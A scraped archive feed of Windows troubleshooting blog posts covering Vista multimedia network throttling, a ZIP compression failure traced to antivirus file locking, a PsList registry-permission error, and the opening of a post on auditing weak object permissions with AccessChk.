Because other threads run at priorities in the dynamic priority range, which tops out at priority 15, even very CPU intensive applications won’t interfere with the playback. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> You can see the boost by playing an audio or video clip in Windows Media Player (WMP), running the Reliability and Performance Monitor (Start-&gt;Run-&gt;Perfmon), selecting the Performance Monitor item, and adding the Priority Current value for all the Wmplayer threads in the Thread object. Set the graph scale to 31 (the highest priority value on Windows) and you’ll easily spot the boosted thread, shown here running at priority 21: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="476" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833251/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833251/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120984i46EB8F41367E1095" style="WIDTH: 550px; HEIGHT: 476px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Besides activity by other threads, media playback can also be affected by network activity. When a network packet arrives at a system, it triggers a CPU interrupt, which causes the device driver for the device at which the packet arrived to execute an Interrupt Service Routine (ISR). Other device interrupts are blocked while ISRs run, so ISRs typically do some device bookkeeping and then perform the more lengthy transfer of data to or from their device in a Deferred Procedure Call (DPC) that runs with device interrupts enabled. 
While DPCs execute with interrupts enabled, they take precedence over all thread execution, regardless of priority, on the processor on which they run, and can therefore impede media playback threads. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Network DPC receive processing is among the most expensive, because it includes handing packets to the TCP/IP driver, which can result in lengthy computation. The TCP/IP driver verifies each packet, determines the packet’s protocol, updates the connection state, finds the receiving application, and copies the received data into the application’s buffers. This Process Explorer screenshot shows how CPU usage for DPCs rose dramatically when I copied a large file from another system: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="208" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833252/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833252/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120985i3C5B0E6A8BABD8A5" style="WIDTH: 460px; HEIGHT: 208px" width="460" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Tests of MMCSS during Vista development showed that, even with thread-priority boosting, heavy network traffic can cause enough long-running DPCs to prevent playback threads from keeping up with their media streaming requirements, resulting in glitching. MMCSS’ glitch-resistant mechanisms were therefore extended to include throttling of network activity. 
It does so by issuing a command to the NDIS device driver, which is the driver that gives packets received by network adapter drivers to the TCP/IP driver, that causes NDIS to “indicate”, or pass along, at most 10 packets per millisecond (10,000 packets per second). </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Because the standard Ethernet frame size is about 1500 bytes, a limit of 10,000 packets per second equals a maximum throughput of roughly 15MB/s. 100Mb networks can handle at most 12MB/s, so if your system is on a 100Mb network, you typically won’t see any slowdown. However, if you have a 1Gb network infrastructure and both the sending system and your Vista receiving system have 1Gb network adapters, you’ll see throughput drop to roughly 15%. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Further, there’s an unfortunate bug in the NDIS throttling code that magnifies throttling if you have multiple NICs. If you have a system with both wireless and wired adapters, for instance, NDIS will process at most 8000 packets per second, and with three adapters it will process a maximum of 6000 packets per second. 6000 packets per second equals 9MB/s, a limit that’s visible even on 100Mb networks. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I caused throttling to be visible on my laptop, which has three adapters, by copying a large file to it from another system and then starting WMP and playing a song. 
The Task Manager screenshot below shows that the copy achieves about 20% network utilization on my 1Gb network, but drops to around 6% after I start playing a song: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="618" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833257/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833257/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120986i93B5BF3AE5355F3B" style="WIDTH: 499px; HEIGHT: 618px" width="499" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> You can monitor the number of receive packets NDIS processes by adding the “packets received per second” counter in the Network object to the Performance Monitor view. Below, you can see the packet receive rate change as I ran the experiment. The number of packets NDIS processed didn’t reach the theoretical throttling maximum of 6,000, probably due to handshaking with the remote system. 
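</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The throttling arithmetic above can be sketched in a few lines of Python. This is only an illustration of the numbers quoted in this post, not anything taken from the NDIS or MMCSS code: the function names are hypothetical, the frame size is the approximate 1500 bytes used above, and link capacity is treated as the raw bit rate divided by eight with no allowance for protocol overhead. </FONT> </P>
<PRE>
```python
FRAME_BYTES = 1500  # approximate standard Ethernet frame size used in the article


def throughput_mb_per_s(packets_per_second, frame_bytes=FRAME_BYTES):
    """Convert a packet-rate ceiling into megabytes per second (1 MB = 10**6 bytes)."""
    return packets_per_second * frame_bytes / 1_000_000


def link_mb_per_s(megabits_per_second):
    """Raw link capacity in megabytes per second, ignoring protocol overhead."""
    return megabits_per_second / 8


# Packet-rate ceilings quoted in the article for one, two and three adapters.
for adapters, pps in ((1, 10_000), (2, 8_000), (3, 6_000)):
    ceiling = throughput_mb_per_s(pps)
    share_of_gigabit = 100 * ceiling / link_mb_per_s(1000)
    print(f"{adapters} adapter(s): {ceiling:.1f} MB/s, {share_of_gigabit:.1f}% of a 1Gb link")
```
</PRE>
<P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> With these assumptions the single-adapter ceiling comes out at 15 MB/s and the three-adapter ceiling at 9 MB/s, which is why the three-adapter limit is the one that falls below what a 100Mb link can carry. 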
</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="377" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833259/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833259/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120987iF7B8E79AF6D4405E" style="WIDTH: 550px; HEIGHT: 377px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Despite even this level of throttling, Internet traffic, even on the best broadband connection, won’t be affected. That’s because the multiplicity of intermediate connections between your system and another one on the Internet fragments packets and slows down packet travel, and therefore reduces the rate at which systems transfer data. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The throttling rate Vista uses was derived from experiments that reliably achieved glitch-resistant playback on systems with one CPU on 100Mb networks with high packet receive rates. The hard-coded limit was short-sighted with respect to today’s systems that have faster CPUs, multiple cores and Gigabit networks. In addition to fixing the bug that affects throttling on multi-adapter systems, the networking team is actively working with the MMCSS team on a fix that penalizes network traffic less dramatically while still delivering a glitch-resistant experience. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Stay tuned to my blog for more information. 
</FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:34:54 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/vista-multimedia-playback-and-network-throughput/ba-p/723591 MarkRussinovich 2019-06-27T06:34:54Z The Case of the Failed File Compression https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-failed-file-compression/ba-p/723585 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 06, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The other day Bryce tried to use Explorer’s <B style="mso-bidi-font-weight: normal"> Send To Compressed (zipped) Folder </B> feature, seen below, to package up his latest </FONT> <A href="#" target="_blank"> <FONT face="Calibri" size="3"> Process Monitor </FONT> </A> <FONT face="Calibri" size="3"> source code updates to send me. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="152" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702268/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702268/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120974iED9A8493C927E841" style="WIDTH: 445px; HEIGHT: 152px" width="445" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Instead of presenting a compression progress dialog followed by an opportunity to edit the name of the resulting compressed file, Explorer aborted the compression with this error: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="172" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702271/original.aspx" 
original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702271/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120975iAF4BEFFB01594EAF" style="WIDTH: 408px; HEIGHT: 172px" width="408" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Bryce was perplexed. The error didn’t seem to make any sense because he obviously had read permission to the files in the selection, which he’d just finished editing, and compressing files shouldn’t involve some kind of search that could result in a file not being found. <SPAN style="mso-spacerun: yes"> </SPAN> He retried the compression operation, but got the same error, this time after a different number of files had finished compressing. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I happened to walk into his office at this point and he showed me the behavior by trying a few more times, all with the same outcome. <SPAN style="mso-spacerun: yes"> </SPAN> Now both of us were perplexed. It was time to investigate, and the tool we called on for the job was, somewhat ironically, Process Monitor. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> We launched Process Monitor, reproduced the failure, stopped the capture, and scanned through the thousands of operations in the trace looking for errors. We saw a slew of NOT FOUND errors near the start of the log, which are the generally innocuous result of an application checking for the pre-existence of a file. 
In fact, there were literally hundreds of them near the beginning of the log, all of which were queries for the file into which the compressed files would be placed: </FONT> </P> <BR /> <P class="MsoNormal" mce_keep="true" style="MARGIN: 0in 0in 10pt"> <IMG height="210" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702272/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702272/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120976i61995A10F9E4B9F6" style="WIDTH: 550px; HEIGHT: 210px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> That was disturbing, but not directly related to our troubleshooting effort, so I filed it away to look at later. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Several hundred events into the trace later we came across a SHARING VIOLATION error that bore a closer look: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="111" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702275/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702275/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120977i13431E5D9AA40614" style="WIDTH: 550px; HEIGHT: 111px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> When a process opens a file it can specify if and how it wants to share the file with other processes while it has the file opened. The three types of sharing are read, write and delete, and each is represented with a flag that a process passes to the CreateFile API. 
In the operation that failed, Explorer didn’t pass any of the flags, indicating that it didn’t want to share the file, as seen in the ShareMode field: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="118" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702276/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702276/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120978iA721B62F64A47733" style="WIDTH: 426px; HEIGHT: 118px" width="426" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> For an open to succeed, the sharing mode of the opener must be compatible with the sharing allowed by a process that already has the file opened, so the explanation for the error was that another process already had the file opened. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Looking back at the trace, the open operation immediately preceding the one with the error is an open of the same file by a process named Inort.exe. Inort’s close of the file isn’t visible in the screenshot because it comes long after Explorer’s failed attempt to open the file. That confirmed that Explorer’s unwillingness to share the file conflicted with Inort having the file open, despite the fact that Inort specified read, write and delete sharing in its open of the file. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Process Monitor had closed another case: Inort holding the file open when Explorer tried to open it was the cause of the sharing violation and almost certainly the reason for the misleading error message. Next we had to identify Inort so that we could come up with a fix or workaround. 
Process Monitor also answered that question with its image tooltip: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702279/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702279/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120979i37AFE8AA1E0C9041" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> eTrust, Computer Associates’ Antivirus scanner, was apparently opening the file to scan it for viruses, but interfering with the operation of Explorer. Antivirus should be invisible to the system, so the error revealed a bug in eTrust. The workaround was for Bryce to set a directory filter that excludes his source directories from real-time scanning. <SPAN style="mso-spacerun: yes"> </SPAN> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I couldn’t reproduce the error when I went back to my office, so I suspected that I had a different version of Inoculan on my system than Bryce. 
Process Monitor’s process page on the event properties dialog for an Inort.exe event showed that Bryce had version 7.01.0192.0001 and I had the more recent 7.01.0501.000: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> </FONT> <SPAN style="mso-no-proof: yes"> <SPAN style="mso-no-proof: yes"> <IMG height="149" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702283/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702283/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120980i3863BB76D22FB6DD" style="WIDTH: 294px; HEIGHT: 149px" width="294" /> </SPAN> <IMG height="152" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702281/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702281/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120981iAA59A4C17D703871" style="WIDTH: 307px; HEIGHT: 152px" width="307" /> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Why we have different versions isn’t clear since we’re both using images deployed and managed by Microsoft IT, but it appears that Computer Associates has fixed the bug in newer releases. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Now I turned my attention back to the inefficiencies of Explorer’s compression feature. I captured a Process Monitor trace of the compression of a single file and counted the associated operations. Just for this simple case, Explorer opened the target ZIP file 14 times, 12 of those before it had actually created the file and therefore with NOT FOUND results, and performed directory lookups of the target 19 times. 
It was also redundant with the source file, opening it 28 times and querying the file’s basic properties 17 times. It’s not like Explorer doesn’t give eTrust plenty of opportunities to cause sharing problems. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> In order to verify that Explorer itself was at fault, and not some third-party extension, I looked at the stacks of various events by selecting the event and typing Ctrl+K to open the event properties dialog to the stack page: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="191" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702286/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702286/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120982iB02A34183B112719" style="WIDTH: 550px; HEIGHT: 191px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Zipfldr.dll, the Explorer file compression DLL, was in most of the stack traces, meaning that&nbsp;the compression engine itself was ultimately responsible for the waste. Further, the number of repetitious operations explodes when you compress multiple files. There are clearly easy ways to improve the algorithm, so hopefully we’ll see a more efficient compression engine in Windows 7. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <EM> Update: I've learned that the compression engine has been updated in Vista SP1 to perform fewer file operations. 
</EM> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> On a closing note, if you’d like to catch me at my next public speaking engagement, come to </FONT> <A href="#" target="_blank"> <FONT face="Calibri" size="3"> Wintellect’s Devscovery </FONT> </A> <FONT face="Calibri" size="3"> conference in Redmond, August 14-16, where I’m delivering a keynote on Vista kernel changes. </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:34:16 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-failed-file-compression/ba-p/723585 MarkRussinovich 2019-06-27T06:34:16Z The Case of the Unexpected PsList Error https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unexpected-pslist-error/ba-p/723574 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 05, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Not long after I deployed Windows Vista on my main desktop system I noticed that a process became unresponsive and appeared to be consuming excessive amounts of CPU. I had a command prompt handy, so I ran </FONT> <A href="#" target="_blank"> <FONT face="Calibri" size="3"> PsList </FONT> </A> <FONT face="Calibri" size="3"> to dump detailed information about the process as one of my troubleshooting steps. 
Instead of reporting a page full of statistics as I expected, however, PsList printed its banner, an error message, and exited: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-spacerun: yes"> <FONT face="Calibri" size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="178" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449287/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449287/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120970i9D451B8D46D1919A" style="WIDTH: 550px; HEIGHT: 178px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> PsList obtains information from the system performance counters, which an application accesses using standard Registry functions directed at the virtual HKEY_PERFORMANCE_DATA key, so the message indicated that PsList was unable to query the virtual performance keys. When you point PsList at a remote system and don’t have administrative rights on that system, or the system isn’t running the Remote Registry service, then PsList reports the same error, but I had never seen the message when using PsList to look at a local system. Something was different about Windows Vista and I set out to learn what. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Putting my original troubleshooting mission on hold, I launched </FONT> <A href="#" target="_blank"> <FONT face="Calibri" size="3"> Process Monitor </FONT> </A> <FONT face="Calibri" size="3"> and repeated the PsList command with Process Monitor looking on. 
I didn’t have a firm expectation that it would reveal the cause of the problem, but experience has taught me that Process Monitor (and its predecessors Filemon and Regmon) often solves seemingly unexplainable problems like this. I scanned the trace looking for anomalous error codes, because when they’re present they almost always point to the source of a problem, and found an access denied error: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="73" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449289/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449289/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120971i50AAED5CD7998CE4" style="WIDTH: 566px; HEIGHT: 73px" width="566" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> For some reason, PsList, running as a standard user because I hadn’t elevated the command prompt from which I ran it, was unable to open the PerfLib registry key for read access. I was perplexed because on Windows XP I had been able to run PsList as a standard user. I launched Regedit, navigated to the key, and viewed its permissions. 
As I suspected, standard users aren’t members of any of the groups to which the permissions grant access (note the presence of two new performance-related groups, Performance Log&nbsp;Users and Performance Monitor Users): </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-spacerun: yes"> <FONT face="Calibri" size="3"> <IMG height="275" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449291/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449291/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120972iA9629C63B38CEF16" style="WIDTH: 550px; HEIGHT: 275px" width="550" /> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I quickly confirmed that to be the reason for PsList’s failure by granting the Interactive Users group read access to the key and verifying that PsList subsequently worked. Now I was left with the question of what permissions Windows XP assigns the key. I switched to a Windows XP test system and viewed the key’s permissions. 
Sure enough, Interactive Users have read access, explaining why PsList works as a&nbsp;standard user on Windows XP systems: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="224" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449294/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1449294/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120973i50A86F1AC2774CF2" style="WIDTH: 530px; HEIGHT: 224px" width="530" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I then pondered the reason for the change. I suspected the new permissions close an information disclosure hole, but after some thought I concluded that they aren’t closing any hole. </FONT> <FONT face="Calibri" size="3"> The PerfLib key is where performance providers register their counters and DLLs, so when a tool like PsList queries a counter the performance API loads the associated DLL into the querying process and calls functions in the DLL that return the desired data. Because the DLLs execute in the context of the process into which they load, they can’t implement security that can’t be easily circumvented by the process. It’s therefore the responsibility of a performance data source, which might be the kernel or an application like Internet Information Server (IIS), to prevent unauthorized access to its performance data. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Preventing read access to the PerfLib key is therefore the equivalent of having a performance DLL implement security. 
While locking down the key prevents the performance API from determining what counters are available and what DLLs provide performance data, with the exception of add-on applications, the core registrations are constant from system to system. That means that a process can circumvent any protection the locked-down key is attempting to provide by directly loading performance DLLs and calling their data functions. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> To make a long story short, I filed a bug against Windows Vista Service Pack 1 (SP1) and Windows Server 2008 to have Interactive Users added back to PerfLib’s permissions. The reliability and diagnostics team reported back that the permissions changed inadvertently during the release of Windows Server 2003, but I convinced them it didn’t make sense, so&nbsp;in SP1 and Windows Server 2008 you won’t need to edit PerfLib’s permissions to be able to run tools like PsList as a standard user. </FONT> </P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> </P><P> <FONT face="Calibri" size="3"> Another case closed by Process Monitor! </FONT> </P> <P></P> </BODY></HTML> Thu, 27 Jun 2019 06:33:12 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unexpected-pslist-error/ba-p/723574 MarkRussinovich 2019-06-27T06:33:12Z The Case of the Insecure Security Software https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-insecure-security-software/ba-p/723569 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jun 15, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> A little over a year ago I set out to determine exactly why, prior to Windows Vista, the Power Users security group was considered by most to be the equivalent of the Administrators group. 
I knew the answer lay in the fact that default Windows permissions allow the group to modify specific Registry keys and files <SPAN style="mso-spacerun: yes"> </SPAN> that <SPAN style="mso-spacerun: yes"> </SPAN> enable members of the group to elevate their privileges to that of the Local System or Administrators group, but I didn’t know of any concrete examples. I could have manually investigated the security on every file, directory and Registry key, but instead decided to write a utility, <A class="" href="#" mce_href="#" target="_blank"> AccessChk </A> , that would answer questions like this automatically. AccessChk quickly showed me directories, files, keys, and even Windows services written by third parties, that Power Users could modify to cause an elevation of privilege. I posted my findings in my blog post <A class="" href="#" mce_href="#" target="_blank"> The Power in Power Users </A> . </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Since the posting, AccessChk has grown in popularity as a system security auditing tool that helps identify weak permissions problems. I’ve recently received requests from groups within Microsoft and elsewhere to extend its coverage of securable objects analyzed to include the Object Manager namespace (which stores named mutexes, semaphores and memory-mapped files), the Service Control Manager, and named pipes. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> When I revisited the tool to add this support, I reran some of the same queries I had performed when I wrote the blog post, like seeing what system-global objects the Everyone and Users groups can modify. 
<SPAN style="mso-spacerun: yes"> </SPAN> The ability to change those objects almost always indicates the ability for unprivileged users to compromise other accounts, elevate to system or administrative privilege, or prevent services or programs run by the system or other users from functioning. For example, if an unprivileged user can change an executable in the %programfiles% directory they might be able to cause another user to execute their code. Some applications include Windows services, so if a user could change the service executable they could obtain system privileges. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> These local elevation-of-privilege and denial-of-service holes are unimportant on single-user systems where the user is an administrator, but on systems where a user expects to be secure when running as a standard user (like Windows Vista), and on shared computers like family PCs that have unprivileged accounts, Terminal Server systems, and kiosk computers, they break down the security boundaries that Windows provides to separate unprivileged users from each other and from the system. <SPAN style="mso-spacerun: yes"> </SPAN> </FONT> </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> In my testing I executed AccessChk commands to look for potential security issues in each of the namespaces it supports. In the commands below, the -s option has AccessChk recurse a namespace, -w has it list only the objects for which the specified group – Everyone in the examples – has write access, and -u directs AccessChk to not report errors when it can’t query objects for which your account lacks permissions. The other switches indicate what namespace to examine, where the default is the file system. 
